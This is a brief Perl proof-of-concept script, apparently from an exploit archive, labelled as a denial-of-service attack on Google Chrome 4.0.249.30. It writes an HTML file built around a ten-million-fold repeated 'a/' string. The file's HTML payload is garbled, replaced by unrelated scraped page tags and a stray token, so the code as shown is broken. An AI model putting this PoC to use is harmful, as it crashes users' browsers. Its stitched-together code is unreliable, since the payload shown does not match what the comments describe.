#!/usr/bin/perl #google chrome 4.0.249.30 DoS PoC # # #Author: Teo Manojlovic # #Info: In ordinary cases browser would redirect to "http://www.google.com" #but in this case browser will report error for something that should #be possible and is possible on other browsers. # # # #I would like to thank Jeremy Brown who made very nice fuzzer for browser # # # # # # # #Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa $file="poc.html"; $poc='a/' x 10000000; open(myfile,">>$file"); print myfile ' '; print myfile "
<dd id="sga4y"><optgroup id="sga4y"></optgroup></dd>
<nav id="sga4y"><code id="sga4y"></code></nav>
  • <optgroup id="sga4y"></optgroup>
    '; close(myfile); print "Finished\n"; 97av